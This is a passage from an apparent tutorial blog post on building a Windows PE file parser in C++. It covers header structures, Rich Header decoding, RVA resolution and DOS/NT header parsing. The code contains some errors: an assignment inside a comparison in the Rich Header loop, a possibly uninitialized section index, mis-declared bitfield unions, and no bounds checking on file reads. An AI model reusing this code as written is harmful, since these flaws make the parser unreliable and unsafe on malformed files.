    • IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT
    • IMAGE_DIRECTORY_ENTRY_IAT
    • IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT
    • IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
    • IMAGE_SIZEOF_SHORT_NAME
    • IMAGE_SIZEOF_SECTION_HEADER
  • Structures:
    • IMAGE_DOS_HEADER
    • IMAGE_DATA_DIRECTORY
    • IMAGE_OPTIONAL_HEADER32
    • IMAGE_OPTIONAL_HEADER64
    • IMAGE_FILE_HEADER
    • IMAGE_NT_HEADERS32
    • IMAGE_NT_HEADERS64
    • IMAGE_IMPORT_DESCRIPTOR
    • IMAGE_IMPORT_BY_NAME
    • IMAGE_BASE_RELOCATION
    • IMAGE_SECTION_HEADER

I took these definitions from winnt.h and added them to a new header called winntdef.h.

winntdef.h:

typedef unsigned char BYTE;
typedef unsigned short WORD;
typedef unsigned long DWORD;
typedef unsigned long long QWORD;
typedef unsigned long LONG;
typedef __int64 LONGLONG;
typedef unsigned __int64 ULONGLONG;

#define ___IMAGE_NT_OPTIONAL_HDR32_MAGIC       0x10b
#define ___IMAGE_NT_OPTIONAL_HDR64_MAGIC       0x20b
#define ___IMAGE_NUMBEROF_DIRECTORY_ENTRIES    16
#define ___IMAGE_DOS_SIGNATURE                 0x5A4D

#define ___IMAGE_DIRECTORY_ENTRY_EXPORT          0
#define ___IMAGE_DIRECTORY_ENTRY_IMPORT          1
#define ___IMAGE_DIRECTORY_ENTRY_RESOURCE        2
#define ___IMAGE_DIRECTORY_ENTRY_EXCEPTION       3
#define ___IMAGE_DIRECTORY_ENTRY_SECURITY        4
#define ___IMAGE_DIRECTORY_ENTRY_BASERELOC       5
#define ___IMAGE_DIRECTORY_ENTRY_DEBUG           6
#define ___IMAGE_DIRECTORY_ENTRY_ARCHITECTURE    7
#define ___IMAGE_DIRECTORY_ENTRY_GLOBALPTR       8
#define ___IMAGE_DIRECTORY_ENTRY_TLS             9
#define ___IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG    10
#define ___IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT   11
#define ___IMAGE_DIRECTORY_ENTRY_IAT            12
#define ___IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT   13
#define ___IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR 14

#define ___IMAGE_SIZEOF_SHORT_NAME              8
#define ___IMAGE_SIZEOF_SECTION_HEADER          40

typedef struct __IMAGE_DOS_HEADER {
    WORD   e_magic;
    WORD   e_cblp;
    WORD   e_cp;
    WORD   e_crlc;
    WORD   e_cparhdr;
    WORD   e_minalloc;
    WORD   e_maxalloc;
    WORD   e_ss;
    WORD   e_sp;
    WORD   e_csum;
    WORD   e_ip;
    WORD   e_cs;
    WORD   e_lfarlc;
    WORD   e_ovno;
    WORD   e_res[4];
    WORD   e_oemid;
    WORD   e_oeminfo;
    WORD   e_res2[10];
    LONG   e_lfanew;
} ___IMAGE_DOS_HEADER, * ___PIMAGE_DOS_HEADER;

typedef struct __IMAGE_DATA_DIRECTORY {
    DWORD   VirtualAddress;
    DWORD   Size;
} ___IMAGE_DATA_DIRECTORY, * ___PIMAGE_DATA_DIRECTORY;


typedef struct __IMAGE_OPTIONAL_HEADER {
    WORD    Magic;
    BYTE    MajorLinkerVersion;
    BYTE    MinorLinkerVersion;
    DWORD   SizeOfCode;
    DWORD   SizeOfInitializedData;
    DWORD   SizeOfUninitializedData;
    DWORD   AddressOfEntryPoint;
    DWORD   BaseOfCode;
    DWORD   BaseOfData;
    DWORD   ImageBase;
    DWORD   SectionAlignment;
    DWORD   FileAlignment;
    WORD    MajorOperatingSystemVersion;
    WORD    MinorOperatingSystemVersion;
    WORD    MajorImageVersion;
    WORD    MinorImageVersion;
    WORD    MajorSubsystemVersion;
    WORD    MinorSubsystemVersion;
    DWORD   Win32VersionValue;
    DWORD   SizeOfImage;
    DWORD   SizeOfHeaders;
    DWORD   CheckSum;
    WORD    Subsystem;
    WORD    DllCharacteristics;
    DWORD   SizeOfStackReserve;
    DWORD   SizeOfStackCommit;
    DWORD   SizeOfHeapReserve;
    DWORD   SizeOfHeapCommit;
    DWORD   LoaderFlags;
    DWORD   NumberOfRvaAndSizes;
    ___IMAGE_DATA_DIRECTORY DataDirectory[___IMAGE_NUMBEROF_DIRECTORY_ENTRIES];
} ___IMAGE_OPTIONAL_HEADER32, * ___PIMAGE_OPTIONAL_HEADER32;

typedef struct __IMAGE_OPTIONAL_HEADER64 {
    WORD        Magic;
    BYTE        MajorLinkerVersion;
    BYTE        MinorLinkerVersion;
    DWORD       SizeOfCode;
    DWORD       SizeOfInitializedData;
    DWORD       SizeOfUninitializedData;
    DWORD       AddressOfEntryPoint;
    DWORD       BaseOfCode;
    ULONGLONG   ImageBase;
    DWORD       SectionAlignment;
    DWORD       FileAlignment;
    WORD        MajorOperatingSystemVersion;
    WORD        MinorOperatingSystemVersion;
    WORD        MajorImageVersion;
    WORD        MinorImageVersion;
    WORD        MajorSubsystemVersion;
    WORD        MinorSubsystemVersion;
    DWORD       Win32VersionValue;
    DWORD       SizeOfImage;
    DWORD       SizeOfHeaders;
    DWORD       CheckSum;
    WORD        Subsystem;
    WORD        DllCharacteristics;
    ULONGLONG   SizeOfStackReserve;
    ULONGLONG   SizeOfStackCommit;
    ULONGLONG   SizeOfHeapReserve;
    ULONGLONG   SizeOfHeapCommit;
    DWORD       LoaderFlags;
    DWORD       NumberOfRvaAndSizes;
    ___IMAGE_DATA_DIRECTORY DataDirectory[___IMAGE_NUMBEROF_DIRECTORY_ENTRIES];
} ___IMAGE_OPTIONAL_HEADER64, * ___PIMAGE_OPTIONAL_HEADER64;

typedef struct __IMAGE_FILE_HEADER {
    WORD    Machine;
    WORD    NumberOfSections;
    DWORD   TimeDateStamp;
    DWORD   PointerToSymbolTable;
    DWORD   NumberOfSymbols;
    WORD    SizeOfOptionalHeader;
    WORD    Characteristics;
} ___IMAGE_FILE_HEADER, * ___PIMAGE_FILE_HEADER;

typedef struct __IMAGE_NT_HEADERS64 {
    DWORD Signature;
    ___IMAGE_FILE_HEADER FileHeader;
    ___IMAGE_OPTIONAL_HEADER64 OptionalHeader;
} ___IMAGE_NT_HEADERS64, * ___PIMAGE_NT_HEADERS64;

typedef struct __IMAGE_NT_HEADERS {
    DWORD Signature;
    ___IMAGE_FILE_HEADER FileHeader;
    ___IMAGE_OPTIONAL_HEADER32 OptionalHeader;
} ___IMAGE_NT_HEADERS32, * ___PIMAGE_NT_HEADERS32;

typedef struct __IMAGE_IMPORT_DESCRIPTOR {
    union {
        DWORD   Characteristics;
        DWORD   OriginalFirstThunk;
    } DUMMYUNIONNAME;
    DWORD   TimeDateStamp;
    DWORD   ForwarderChain;
    DWORD   Name;
    DWORD   FirstThunk;
} ___IMAGE_IMPORT_DESCRIPTOR, * ___PIMAGE_IMPORT_DESCRIPTOR;

typedef struct __IMAGE_IMPORT_BY_NAME {
    WORD    Hint;
    char   Name[100];
} ___IMAGE_IMPORT_BY_NAME, * ___PIMAGE_IMPORT_BY_NAME;

typedef struct __IMAGE_BASE_RELOCATION {
    DWORD   VirtualAddress;
    DWORD   SizeOfBlock;
} ___IMAGE_BASE_RELOCATION, * ___PIMAGE_BASE_RELOCATION;

typedef struct __IMAGE_SECTION_HEADER {
    BYTE    Name[___IMAGE_SIZEOF_SHORT_NAME];
    union {
        DWORD   PhysicalAddress;
        DWORD   VirtualSize;
    } Misc;
    DWORD   VirtualAddress;
    DWORD   SizeOfRawData;
    DWORD   PointerToRawData;
    DWORD   PointerToRelocations;
    DWORD   PointerToLinenumbers;
    WORD    NumberOfRelocations;
    WORD    NumberOfLinenumbers;
    DWORD   Characteristics;
} ___IMAGE_SECTION_HEADER, * ___PIMAGE_SECTION_HEADER;

Custom Structures

I defined the following structures to help with the parsing process. They’re defined in the PEFILE_CUSTOM_STRUCTS.h header.

RICH_HEADER_INFO

A structure to hold information about the Rich Header during processing.

typedef struct __RICH_HEADER_INFO {
    int size;
    char* ptrToBuffer;
    int entries;
} RICH_HEADER_INFO, * PRICH_HEADER_INFO;
  • size: Size of the Rich Header (in bytes).
  • ptrToBuffer: A pointer to the buffer containing the data of the Rich Header.
  • entries: Number of entries in the Rich Header.
RICH_HEADER_ENTRY

A structure to represent a Rich Header entry.

typedef struct __RICH_HEADER_ENTRY {
    WORD  prodID;
    WORD  buildID;
    DWORD useCount;
} RICH_HEADER_ENTRY, * PRICH_HEADER_ENTRY;
  • prodID: Type ID / Product ID.
  • buildID: Build ID.
  • useCount: Use count.
RICH_HEADER

A structure to represent the Rich Header.

typedef struct __RICH_HEADER {
    PRICH_HEADER_ENTRY entries;
} RICH_HEADER, * PRICH_HEADER;
  • entries: A pointer to a RICH_HEADER_ENTRY array.
ILT_ENTRY_32

A structure to represent a 32-bit ILT entry during processing.

typedef struct __ILT_ENTRY_32 {
    union {
        DWORD ORDINAL : 16;
        DWORD HINT_NAME_TABE : 32;
        DWORD ORDINAL_NAME_FLAG : 1;
    } FIELD_1;
} ILT_ENTRY_32, * PILT_ENTRY_32;

The structure will hold a 32-bit value and will return the appropriate piece of information (using bit fields) when the member corresponding to that piece of information is accessed.

ILT_ENTRY_64

A structure to represent a 64-bit ILT entry during processing.

typedef struct __ILT_ENTRY_64 {
    union {
        DWORD ORDINAL : 16;
        DWORD HINT_NAME_TABE : 32;
    } FIELD_2;
    DWORD ORDINAL_NAME_FLAG : 1;
} ILT_ENTRY_64, * PILT_ENTRY_64;

The structure will hold a 64-bit value and will return the appropriate piece of information (using bit fields) when the member corresponding to that piece of information is accessed.

BASE_RELOC_ENTRY

A structure to represent a base relocation entry during processing.

typedef struct __BASE_RELOC_ENTRY {
    WORD OFFSET : 12;
    WORD TYPE : 4;
} BASE_RELOC_ENTRY, * PBASE_RELOC_ENTRY;
  • OFFSET: Relocation offset.
  • TYPE: Relocation type.

PEFILE

Our parser will represent a PE file as an object type of either PE32FILE or PE64FILE.
These 2 classes only differ in some member definitions but their functionality is identical.
Throughout this post we will use the code from PE64FILE.

Definition

The class is defined as follows:

class PE64FILE
{
public:
    PE64FILE(char* _NAME, FILE* Ppefile);
	
    void PrintInfo();

private:
    char* NAME;
    FILE* Ppefile;
    int _import_directory_count, _import_directory_size;
    int _basreloc_directory_count;

    // HEADERS
    ___IMAGE_DOS_HEADER     PEFILE_DOS_HEADER;
    ___IMAGE_NT_HEADERS64   PEFILE_NT_HEADERS;

    // DOS HEADER
    DWORD PEFILE_DOS_HEADER_EMAGIC;
    LONG  PEFILE_DOS_HEADER_LFANEW;

    // RICH HEADER
    RICH_HEADER_INFO PEFILE_RICH_HEADER_INFO;
    RICH_HEADER PEFILE_RICH_HEADER;

    // NT_HEADERS.Signature
    DWORD PEFILE_NT_HEADERS_SIGNATURE;

    // NT_HEADERS.FileHeader
    WORD PEFILE_NT_HEADERS_FILE_HEADER_MACHINE;
    WORD PEFILE_NT_HEADERS_FILE_HEADER_NUMBER0F_SECTIONS;
    WORD PEFILE_NT_HEADERS_FILE_HEADER_SIZEOF_OPTIONAL_HEADER;

    // NT_HEADERS.OptionalHeader
    DWORD PEFILE_NT_HEADERS_OPTIONAL_HEADER_MAGIC;
    DWORD PEFILE_NT_HEADERS_OPTIONAL_HEADER_SIZEOF_CODE;
    DWORD PEFILE_NT_HEADERS_OPTIONAL_HEADER_SIZEOF_INITIALIZED_DATA;
    DWORD PEFILE_NT_HEADERS_OPTIONAL_HEADER_SIZEOF_UNINITIALIZED_DATA;
    DWORD PEFILE_NT_HEADERS_OPTIONAL_HEADER_ADDRESSOF_ENTRYPOINT;
    DWORD PEFILE_NT_HEADERS_OPTIONAL_HEADER_BASEOF_CODE;
    ULONGLONG PEFILE_NT_HEADERS_OPTIONAL_HEADER_IMAGEBASE;
    DWORD PEFILE_NT_HEADERS_OPTIONAL_HEADER_SECTION_ALIGNMENT;
    DWORD PEFILE_NT_HEADERS_OPTIONAL_HEADER_FILE_ALIGNMENT;
    DWORD PEFILE_NT_HEADERS_OPTIONAL_HEADER_SIZEOF_IMAGE;
    DWORD PEFILE_NT_HEADERS_OPTIONAL_HEADER_SIZEOF_HEADERS;

    ___IMAGE_DATA_DIRECTORY PEFILE_EXPORT_DIRECTORY;
    ___IMAGE_DATA_DIRECTORY PEFILE_IMPORT_DIRECTORY;
    ___IMAGE_DATA_DIRECTORY PEFILE_RESOURCE_DIRECTORY;
    ___IMAGE_DATA_DIRECTORY PEFILE_EXCEPTION_DIRECTORY;
    ___IMAGE_DATA_DIRECTORY PEFILE_SECURITY_DIRECTORY;
    ___IMAGE_DATA_DIRECTORY PEFILE_BASERELOC_DIRECTORY;
    ___IMAGE_DATA_DIRECTORY PEFILE_DEBUG_DIRECTORY;
    ___IMAGE_DATA_DIRECTORY PEFILE_ARCHITECTURE_DIRECTORY;
    ___IMAGE_DATA_DIRECTORY PEFILE_GLOBALPTR_DIRECTORY;
    ___IMAGE_DATA_DIRECTORY PEFILE_TLS_DIRECTORY;
    ___IMAGE_DATA_DIRECTORY PEFILE_LOAD_CONFIG_DIRECTORY;
    ___IMAGE_DATA_DIRECTORY PEFILE_BOUND_IMPORT_DIRECTORY;
    ___IMAGE_DATA_DIRECTORY PEFILE_IAT_DIRECTORY;
    ___IMAGE_DATA_DIRECTORY PEFILE_DELAY_IMPORT_DIRECTORY;
    ___IMAGE_DATA_DIRECTORY PEFILE_COM_DESCRIPTOR_DIRECTORY;

    // SECTION HEADERS
    ___PIMAGE_SECTION_HEADER PEFILE_SECTION_HEADERS;

    // IMPORT TABLE
    ___PIMAGE_IMPORT_DESCRIPTOR PEFILE_IMPORT_TABLE;
    
    // BASE RELOCATION TABLE
    ___PIMAGE_BASE_RELOCATION PEFILE_BASERELOC_TABLE;

    // FUNCTIONS
    
    // ADDRESS RESOLVERS
    int  locate(DWORD VA);
    DWORD resolve(DWORD VA, int index);

    // PARSERS
    void ParseFile();
    void ParseDOSHeader();
    void ParseNTHeaders();
    void ParseSectionHeaders();
    void ParseImportDirectory();
    void ParseBaseReloc();
    void ParseRichHeader();

    // PRINT INFO
    void PrintFileInfo();
    void PrintDOSHeaderInfo();
    void PrintRichHeaderInfo();
    void PrintNTHeadersInfo();
    void PrintSectionHeadersInfo();
    void PrintImportTableInfo();
    void PrintBaseRelocationsInfo();
};

The only public member beside the class constructor is a function called printInfo() which will print information about the file.

The class constructor takes two parameters, a char array representing the name of the file and a file pointer to the actual data of the file.

After that comes a long series of variables definitions, these class members are going to be used internally during the parsing process and we’ll mention each one of them later.

In the end is a series of methods definitions, first two methods are called locate and resolve, I will talk about them in a minute.
The rest are functions responsible for parsing different parts of the file, and functions responsible for printing information about the same parts.

Constructor

The constructor of the class simply sets the file pointer and name variables, then it calls the ParseFile() function.

PE64FILE::PE64FILE(char* _NAME, FILE* _Ppefile) {
	
	NAME = _NAME;
	Ppefile = _Ppefile;

	ParseFile();

}

The ParseFile() function calls the other parser functions:

void PE64FILE::ParseFile() {

	// PARSE DOS HEADER
	ParseDOSHeader();

	// PARSE RICH HEADER
	ParseRichHeader();

	//PARSE NT HEADERS
	ParseNTHeaders();

	// PARSE SECTION HEADERS
	ParseSectionHeaders();

	// PARSE IMPORT DIRECTORY
	ParseImportDirectory();

	// PARSE BASE RELOCATIONS
	ParseBaseReloc();

}

Resolving RVAs

Most of the time, we’ll have a RVA that we’ll need to change to a file offset.
The process of resolving an RVA can be outlined as follows:

  1. Determine which section range contains that RVA:
    • Iterate over all sections and for each section compare the RVA to the section virtual address and to the section virtual address added to the virtual size of the section.
    • If the RVA exists within this range then it belongs to that section.
  2. Calculate the file offset:
    • Subtract the RVA from the section virtual address.
    • Add that value to the raw data pointer of the section.

An example of this is locating a Data Directory.
The IMAGE_DATA_DIRECTORY structure only gives us an RVA of the directory, to locate that directory we’ll need to resolve that address.

I wrote two functions to do this, first one to locate the virtual address (locate()), second one to resolve the address (resolve()).

int PE64FILE::locate(DWORD VA) {
	
	int index;
	
	for (int i = 0; i < PEFILE_NT_HEADERS_FILE_HEADER_NUMBER0F_SECTIONS; i++) {
		if (VA >= PEFILE_SECTION_HEADERS[i].VirtualAddress
			&& VA < (PEFILE_SECTION_HEADERS[i].VirtualAddress + PEFILE_SECTION_HEADERS[i].Misc.VirtualSize)){
			index = i;
			break;
		}
	}
	return index;
}

DWORD PE64FILE::resolve(DWORD VA, int index) {

	return (VA - PEFILE_SECTION_HEADERS[index].VirtualAddress) + PEFILE_SECTION_HEADERS[index].PointerToRawData;

}

locate() iterates over the PEFILE_SECTION_HEADERS array, compares the RVA as described above, then it returns the index of the appropriate section header within the PEFILE_SECTION_HEADERS array.

Please note that in order for these functions to work we’ll need to parse out the section headers and fill the PEFILE_SECTION_HEADERS array first.
We still haven’t discussed this part, but I wanted to talk about the address resolvers first.

main function

The main function of the program is fairly simple, it only does 2 things:

  • Create a file pointer to the given file, and validate that the file was read correctly.
  • Call INITPARSE() on the file, and based on the return value it decides between three actions:
    • Exit.
    • Create a PE32FILE object, call PrintInfo(), close the file pointer then exit.
    • Create a PE64FILE object, call PrintInfo(), close the file pointer then exit.

PrintInfo() calls the other print info functions.

int main(int argc, char* argv[])
{
	if (argc != 2) {
		printf("Usage: %s [path to executable]\n", argv[0]);
		return 1;
	}

	FILE * PpeFile;
	fopen_s(&PpeFile, argv[1], "rb");

	if (PpeFile == NULL) {
		printf("Can't open file.\n");
		return 1;
	}

	if (INITPARSE(PpeFile) == 1) {
		exit(1);
	}
	else if (INITPARSE(PpeFile) == 32) {
		PE32FILE PeFile_1(argv[1], PpeFile);
		PeFile_1.PrintInfo();
		fclose(PpeFile);
		exit(0);
	}
	else if (INITPARSE(PpeFile) == 64) {
		PE64FILE PeFile_1(argv[1], PpeFile);
		PeFile_1.PrintInfo();
		fclose(PpeFile);
		exit(0);
	}

	return 0;
}

INITPARSE()

INITPARSE() is a function defined in PEFILE.cpp.
Its only job is to validate that the given file is a PE file, then determine whether the file is PE32 or PE32+.

It reads the DOS header of the file and checks the DOS MZ header, if not found it returns an error.

After validating the PE file, it sets the file position to (DOS_HEADER.e_lfanew + size of DWORD (PE signature) + size of the file header) which is the exact offset of the beginning of the Optional Header.
Then it reads a WORD, we know that the first WORD of the Optional Header is a magic value that indicates the file type, it then compares that word to IMAGE_NT_OPTIONAL_HDR32_MAGIC and IMAGE_NT_OPTIONAL_HDR64_MAGIC, and based on the comparison results it either returns 32 or 64 indicating PE32 or PE32+, or it returns an error.

int INITPARSE(FILE* PpeFile) {

	___IMAGE_DOS_HEADER TMP_DOS_HEADER;
	WORD PEFILE_TYPE;

	fseek(PpeFile, 0, SEEK_SET);
	fread(&TMP_DOS_HEADER, sizeof(___IMAGE_DOS_HEADER), 1, PpeFile);

	if (TMP_DOS_HEADER.e_magic != ___IMAGE_DOS_SIGNATURE) {
		printf("Error. Not a PE file.\n");
		return 1;
	}

	fseek(PpeFile, (TMP_DOS_HEADER.e_lfanew + sizeof(DWORD) + sizeof(___IMAGE_FILE_HEADER)), SEEK_SET);
	fread(&PEFILE_TYPE, sizeof(WORD), 1, PpeFile);

	if (PEFILE_TYPE == ___IMAGE_NT_OPTIONAL_HDR32_MAGIC) {
		return 32;
	}
	else if (PEFILE_TYPE == ___IMAGE_NT_OPTIONAL_HDR64_MAGIC) {
		return 64;
	}
	else {
		printf("Error while parsing IMAGE_OPTIONAL_HEADER.Magic. Unknown Type.\n");
		return 1;
	}

}

Parsing DOS Header

ParseDOSHeader()

Parsing out the DOS Header is nothing complicated, we just need to read from the beginning of the file an amount of bytes equal to the size of the DOS Header, then we can assign that data to the pre-defined class member PEFILE_DOS_HEADER.
From there we can access all of the struct members, however we’re only interested in e_magic and e_lfanew.

void PE64FILE::ParseDOSHeader() {
	
	fseek(Ppefile, 0, SEEK_SET);
	fread(&PEFILE_DOS_HEADER, sizeof(___IMAGE_DOS_HEADER), 1, Ppefile);

	PEFILE_DOS_HEADER_EMAGIC = PEFILE_DOS_HEADER.e_magic;
	PEFILE_DOS_HEADER_LFANEW = PEFILE_DOS_HEADER.e_lfanew;

}

PrintDOSHeaderInfo()

This function prints e_magic and e_lfanew values.

void PE64FILE::PrintDOSHeaderInfo() {
	
	printf(" DOS HEADER:\n");
	printf(" -----------\n\n");

	printf(" Magic: 0x%X\n", PEFILE_DOS_HEADER_EMAGIC);
	printf(" File address of new exe header: 0x%X\n", PEFILE_DOS_HEADER_LFANEW);

}


Parsing Rich Header

Process

To parse out the Rich Header we’ll need to go through multiple steps.

We don’t know anything about the Rich Header, we don’t know its size, we don’t know where it’s exactly located, we don’t even know if the file we’re processing contains a Rich Header in the first place.

First of all, we need to locate the Rich Header.
We don’t know the exact location, however we have everything we need to locate it.
We know that if a Rich Header exists, then it has to exist between the DOS Stub and the PE signature or the beginning of the NT Headers.
We also know that any Rich Header ends with a 32-bit value Rich followed by the XOR key.

One might rely on the fixed size of the DOS Header and the DOS Stub, however, the default DOS Stub message can be changed, so that size is not guaranteed to be fixed.
A better approach would be to read from the beginning of the file to the start of the NT Headers, then search through that buffer for the Rich sequence, if found then we’ve successfully located the end of the Rich Header, if not found then most likely the file doesn’t contain a Rich Header.

Once we’ve located the end of the Rich Header, we can read the XOR key, then go backwards starting from the Rich signature and keep XORing 4 bytes at a time until we reach the DanS signature which indicates the beginning of the Rich Header.

After obtaining the position and the size of the Rich Header, we can normally read and process the data.

ParseRichHeader()

This function starts by allocating a buffer on the heap, then it reads e_lfanew size of bytes from the beginning of the file and stores the data in the allocated buffer.

It then goes through a loop where it does a linear search byte by byte. In each iteration it compares the current byte and the byte the follows to 0x52 (R) and 0x69 (i).
When the sequence is found, it stores the index in a variable then the loop breaks.

	char* dataPtr = new char[PEFILE_DOS_HEADER_LFANEW];
	fseek(Ppefile, 0, SEEK_SET);
	fread(dataPtr, PEFILE_DOS_HEADER_LFANEW, 1, Ppefile);

	int index_ = 0;

	for (int i = 0; i <= PEFILE_DOS_HEADER_LFANEW; i++) {
		if (dataPtr[i] == 0x52 && dataPtr[i + 1] == 0x69) {
			index_ = i;
			break;
		}
	}

	if (index_ == 0) {
		printf("Error while parsing Rich Header.");
		PEFILE_RICH_HEADER_INFO.entries = 0;
		return;
	}

After that it reads the XOR key, then goes into the decryption loop where in each iteration it increments RichHeaderSize by 4 until it reaches the DanS sequence.

	char key[4];
	memcpy(key, dataPtr + (index_ + 4), 4);

	int indexpointer = index_ - 4;
	int RichHeaderSize = 0;

	while (true) {
		char tmpchar[4];
		memcpy(tmpchar, dataPtr + indexpointer, 4);

		for (int i = 0; i < 4; i++) {
			tmpchar[i] = tmpchar[i] ^ key[i];
		}

		indexpointer -= 4;
		RichHeaderSize += 4;

		if (tmpchar[1] = 0x61 && tmpchar[0] == 0x44) {
			break;
		}
	}

After obtaining the size and the position, it allocates a new buffer for the Rich Header, reads and decrypts the Rich Header, updates PEFILE_RICH_HEADER_INFO with the appropriate data pointer, size and number of entries, then finally it deallocates the buffer it was using for processing.

	char* RichHeaderPtr = new char[RichHeaderSize];
	memcpy(RichHeaderPtr, dataPtr + (index_ - RichHeaderSize), RichHeaderSize);

	for (int i = 0; i < RichHeaderSize; i += 4) {

		for (int x = 0; x < 4; x++) {
			RichHeaderPtr[i + x] = RichHeaderPtr[i + x] ^ key[x];
		}

	}

	PEFILE_RICH_HEADER_INFO.size = RichHeaderSize;
	PEFILE_RICH_HEADER_INFO.ptrToBuffer = RichHeaderPtr;
	PEFILE_RICH_HEADER_INFO.entries = (RichHeaderSize - 16) / 8;

	delete[] dataPtr;

The rest of the function reads each entry of the Rich Header and updates PEFILE_RICH_HEADER.

	PEFILE_RICH_HEADER.entries = new RICH_HEADER_ENTRY[PEFILE_RICH_HEADER_INFO.entries];

	for (int i = 16; i < RichHeaderSize; i += 8) {
		WORD PRODID = (uint16_t)((unsigned char)RichHeaderPtr[i + 3] << 8) | (unsigned char)RichHeaderPtr[i + 2];
		WORD BUILDID = (uint16_t)((unsigned char)RichHeaderPtr[i + 1] << 8) | (unsigned char)RichHeaderPtr[i];
		DWORD USECOUNT = (uint32_t)((unsigned char)RichHeaderPtr[i + 7] << 24) | (unsigned char)RichHeaderPtr[i + 6] << 16 | (unsigned char)RichHeaderPtr[i + 5] << 8 | (unsigned char)RichHeaderPtr[i + 4];
		PEFILE_RICH_HEADER.entries[(i / 8) - 2] = {
			PRODID,
			BUILDID,
			USECOUNT
		};

		if (i + 8 >= RichHeaderSize) {
			PEFILE_RICH_HEADER.entries[(i / 8) - 1] = { 0x0000, 0x0000, 0x00000000 };
		}

	}

	delete[] PEFILE_RICH_HEADER_INFO.ptrToBuffer;

Here’s the full function:

void PE64FILE::ParseRichHeader() {
	
	char* dataPtr = new char[PEFILE_DOS_HEADER_LFANEW];
	fseek(Ppefile, 0, SEEK_SET);
	fread(dataPtr, PEFILE_DOS_HEADER_LFANEW, 1, Ppefile);

	int index_ = 0;

	for (int i = 0; i <= PEFILE_DOS_HEADER_LFANEW; i++) {
		if (dataPtr[i] == 0x52 && dataPtr[i + 1] == 0x69) {
			index_ = i;
			break;
		}
	}

	if (index_ == 0) {
		printf("Error while parsing Rich Header.");
		PEFILE_RICH_HEADER_INFO.entries = 0;
		return;
	}

	char key[4];
	memcpy(key, dataPtr + (index_ + 4), 4);

	int indexpointer = index_ - 4;
	int RichHeaderSize = 0;

	while (true) {
		char tmpchar[4];
		memcpy(tmpchar, dataPtr + indexpointer, 4);

		for (int i = 0; i < 4; i++) {
			tmpchar[i] = tmpchar[i] ^ key[i];
		}

		indexpointer -= 4;
		RichHeaderSize += 4;

		if (tmpchar[1] = 0x61 && tmpchar[0] == 0x44) {
			break;
		}
	}

	char* RichHeaderPtr = new char[RichHeaderSize];
	memcpy(RichHeaderPtr, dataPtr + (index_ - RichHeaderSize), RichHeaderSize);

	for (int i = 0; i < RichHeaderSize; i += 4) {

		for (int x = 0; x < 4; x++) {
			RichHeaderPtr[i + x] = RichHeaderPtr[i + x] ^ key[x];
		}

	}

	PEFILE_RICH_HEADER_INFO.size = RichHeaderSize;
	PEFILE_RICH_HEADER_INFO.ptrToBuffer = RichHeaderPtr;
	PEFILE_RICH_HEADER_INFO.entries = (RichHeaderSize - 16) / 8;

	delete[] dataPtr;

	PEFILE_RICH_HEADER.entries = new RICH_HEADER_ENTRY[PEFILE_RICH_HEADER_INFO.entries];

	for (int i = 16; i < RichHeaderSize; i += 8) {
		WORD PRODID = (uint16_t)((unsigned char)RichHeaderPtr[i + 3] << 8) | (unsigned char)RichHeaderPtr[i + 2];
		WORD BUILDID = (uint16_t)((unsigned char)RichHeaderPtr[i + 1] << 8) | (unsigned char)RichHeaderPtr[i];
		DWORD USECOUNT = (uint32_t)((unsigned char)RichHeaderPtr[i + 7] << 24) | (unsigned char)RichHeaderPtr[i + 6] << 16 | (unsigned char)RichHeaderPtr[i + 5] << 8 | (unsigned char)RichHeaderPtr[i + 4];
		PEFILE_RICH_HEADER.entries[(i / 8) - 2] = {
			PRODID,
			BUILDID,
			USECOUNT
		};

		if (i + 8 >= RichHeaderSize) {
			PEFILE_RICH_HEADER.entries[(i / 8) - 1] = { 0x0000, 0x0000, 0x00000000 };
		}

	}

	delete[] PEFILE_RICH_HEADER_INFO.ptrToBuffer;

}

PrintRichHeaderInfo()

This function iterates over each entry in PEFILE_RICH_HEADER and prints its value.

void PE64FILE::PrintRichHeaderInfo() {
	
	printf(" RICH HEADER:\n");
	printf(" ------------\n\n");

	for (int i = 0; i < PEFILE_RICH_HEADER_INFO.entries; i++) {
		printf(" 0x%X 0x%X 0x%X: %d.%d.%d\n",
			PEFILE_RICH_HEADER.entries[i].buildID,
			PEFILE_RICH_HEADER.entries[i].prodID,
			PEFILE_RICH_HEADER.entries[i].useCount,
			PEFILE_RICH_HEADER.entries[i].buildID,
			PEFILE_RICH_HEADER.entries[i].prodID,
			PEFILE_RICH_HEADER.entries[i].useCount);
	}

}


Parsing NT Headers

ParseNTHeaders()

Similar to the DOS Header, all we need to do is to read from e_lfanew an amount of bytes equal to the size of IMAGE_NT_HEADERS.

After that we can parse out the contents of the File Header and the Optional Header.

The Optional Header contains an array of IMAGE_DATA_DIRECTORY structures which we care about.
To parse out this information, we can use the IMAGE_DIRECTORY_[...] constants defined in winnt.h as array indexes to access the corresponding IMAGE_DATA_DIRECTORY structure of each Data Directory.

void PE64FILE::ParseNTHeaders() {
	
	fseek(Ppefile, PEFILE_DOS_HEADER.e_lfanew, SEEK_SET);
	fread(&PEFILE_NT_HEADERS, sizeof(PEFILE_NT_HEADERS), 1, Ppefile);

	PEFILE_NT_HEADERS_SIGNATURE = PEFILE_NT_HEADERS.Signature;

	PEFILE_NT_HEADERS_FILE_HEADER_MACHINE = PEFILE_NT_HEADERS.FileHeader.Machine;
	PEFILE_NT_HEADERS_FILE_HEADER_NUMBER0F_SECTIONS = PEFILE_NT_HEADERS.FileHeader.NumberOfSections;
	PEFILE_NT_HEADERS_FILE_HEADER_SIZEOF_OPTIONAL_HEADER = PEFILE_NT_HEADERS.FileHeader.SizeOfOptionalHeader;

	PEFILE_NT_HEADERS_OPTIONAL_HEADER_MAGIC = PEFILE_NT_HEADERS.OptionalHeader.Magic;
	PEFILE_NT_HEADERS_OPTIONAL_HEADER_SIZEOF_CODE = PEFILE_NT_HEADERS.OptionalHeader.SizeOfCode;
	PEFILE_NT_HEADERS_OPTIONAL_HEADER_SIZEOF_INITIALIZED_DATA = PEFILE_NT_HEADERS.OptionalHeader.SizeOfInitializedData;
	PEFILE_NT_HEADERS_OPTIONAL_HEADER_SIZEOF_UNINITIALIZED_DATA = PEFILE_NT_HEADERS.OptionalHeader.SizeOfUninitializedData;
